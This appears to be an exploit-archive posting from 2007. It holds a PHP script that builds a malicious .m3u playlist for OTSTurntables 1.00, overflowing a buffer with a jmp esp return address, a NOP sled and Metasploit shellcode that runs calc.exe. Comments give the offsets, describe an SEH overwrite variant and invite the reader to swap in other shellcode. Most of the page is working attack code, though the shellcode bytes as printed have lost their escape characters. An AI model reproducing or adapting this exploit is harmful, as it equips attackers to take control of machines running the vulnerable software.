Home / exploits otsturntables-overflow.txt
Posted on 05 September 2007
<?php /* OTSTurntables 1.00 Buffer OverFlow 0days 224 bytes available for shellcode,, you can replace it with you favourite one,, 0x77394540 jmp esp in shell32.dll Winxp sp0 exploit : [A x 277] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] && if you want to exploit this vul with SEH ,, take some infos :p [ A x 277 ] + [EIP] + [B x 608] + [Pointer to next SEH record] + [SE handler] by : 0x58 Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,! */ # win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com $shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84". "xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d". "xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91". "x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5". "x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe". "x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc". "x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53". "xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0". "xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc". "xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0". "xe1xd1xfexd8"; $bof = str_repeat("A",277)."x40x45x39x77".str_repeat("x90",10).$shellcode; $filename = "OTSTurntables.m3u"; $file = fopen($filename,"w+"); fputs($file,"#EXTM3U "); fputs($file,"#EXTINF:0,TITLE "); fputs($file,"C:/"); fputs($file,$bof); fclose($file); echo "Exploit generated in : ".$filename."<br>"; ?>
